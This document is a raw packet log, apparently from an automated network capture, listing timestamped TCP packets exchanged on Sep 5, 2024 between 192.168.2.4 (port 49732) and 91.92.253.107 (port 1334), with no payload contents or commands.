Sep 5, 2024 20:25:29.762463093 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.762542963 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.762584925 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.762686968 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.763325930 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.763571978 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.764883041 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.764974117 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.764990091 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765018940 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765054941 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765058041 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765089989 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765091896 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765127897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765135050 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765175104 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765193939 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765218019 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765228033 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765252113 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765281916 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765290022 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765300035 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765311003 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765322924 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765342951 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765352964 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765368938 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765379906 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765391111 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765398026 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765408993 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765417099 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765418053 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765443087 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765451908 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765459061 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765459061 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765496969 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765506983 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765516996 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765526056 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765535116 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765553951 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.765575886 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.765717983 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.767241955 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767348051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767483950 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.767725945 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767735958 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767745972 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767791033 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.767792940 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767802000 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767819881 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.767828941 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767860889 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767868042 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.767869949 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767909050 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767918110 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767925978 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767935991 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767956972 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.767957926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767967939 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.767993927 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768004894 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768014908 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768029928 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768038988 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768048048 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768049002 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768066883 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768074036 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768076897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768090963 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768093109 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768100023 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768110037 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768111944 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768126965 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768136978 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768188000 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768316031 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768326998 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768335104 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768343925 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768352985 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768362999 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768368006 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768378019 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768383026 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768385887 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768394947 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768416882 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768456936 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768465996 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768476963 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768476963 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768522024 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.768522024 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768532991 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768542051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.768582106 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.769889116 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.769911051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.769918919 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.769928932 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.769952059 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.769993067 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770020008 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770028114 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770036936 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770044088 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770073891 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770075083 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770088911 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770114899 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770145893 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770155907 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770159960 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770164967 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770174980 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770186901 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770196915 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770198107 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770220041 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770224094 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770229101 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770241976 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770251989 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770260096 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770263910 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770272017 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770279884 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770282030 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770292997 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770302057 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770312071 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770344019 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770369053 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770378113 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770409107 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770436049 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770456076 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770464897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770474911 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770478010 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770483971 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770503044 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770514011 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770524979 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770534992 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770544052 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770560980 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770570040 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770584106 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770606041 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770616055 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770623922 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770632029 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770642996 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770652056 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770664930 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770667076 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770713091 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770723104 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770740032 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770747900 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770756006 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770802975 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770852089 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770862103 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770864964 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770873070 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770880938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770925045 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.770935059 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770972967 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.770982981 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.771002054 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.771003962 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.771022081 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.771030903 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.771040916 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.771096945 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.772367001 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772375107 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772388935 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772466898 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772510052 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.772617102 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772625923 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772629976 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772649050 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.772715092 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.772752047 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772759914 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772768021 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772775888 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772797108 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772845984 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.772886992 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772896051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772898912 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772907019 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.772999048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773005962 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773016930 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773025990 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773037910 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773051023 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773063898 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773068905 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773078918 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773097038 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773097992 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773123980 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773134947 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773140907 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773148060 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773155928 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773166895 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773201942 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773219109 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773226976 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773269892 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773278952 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773303986 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773335934 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773346901 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773382902 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773386955 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773391962 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773447990 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773478031 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773487091 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773525953 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773561954 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773574114 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773581028 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773591995 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773600101 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773602962 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773607016 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773617983 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773633957 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773674011 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773682117 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773684978 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773691893 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773701906 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773709059 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773727894 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773782015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773789883 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773797989 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773806095 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773813009 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773821115 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773823977 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773835897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773848057 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773859024 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773909092 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773917913 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773925066 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773927927 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773931980 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773941994 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773951054 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773952961 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.773957968 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.773977041 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774000883 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774040937 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774050951 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774054050 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774055958 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774059057 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774069071 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774076939 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774080038 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774080992 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774161100 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774178982 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774193048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774202108 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774210930 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774211884 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774214983 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774219036 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774229050 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774236917 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774243116 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774265051 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774373055 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774707079 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774813890 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.774826050 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774888992 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.774995089 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775003910 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775007010 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775013924 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775060892 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775105953 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775115013 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775120020 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775127888 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775172949 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775216103 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775224924 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775229931 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775238037 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775263071 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775281906 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775321007 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775357008 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775374889 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775403976 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775429964 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775456905 CEST	49732	1334	192.168.2.4	91.92.253.107
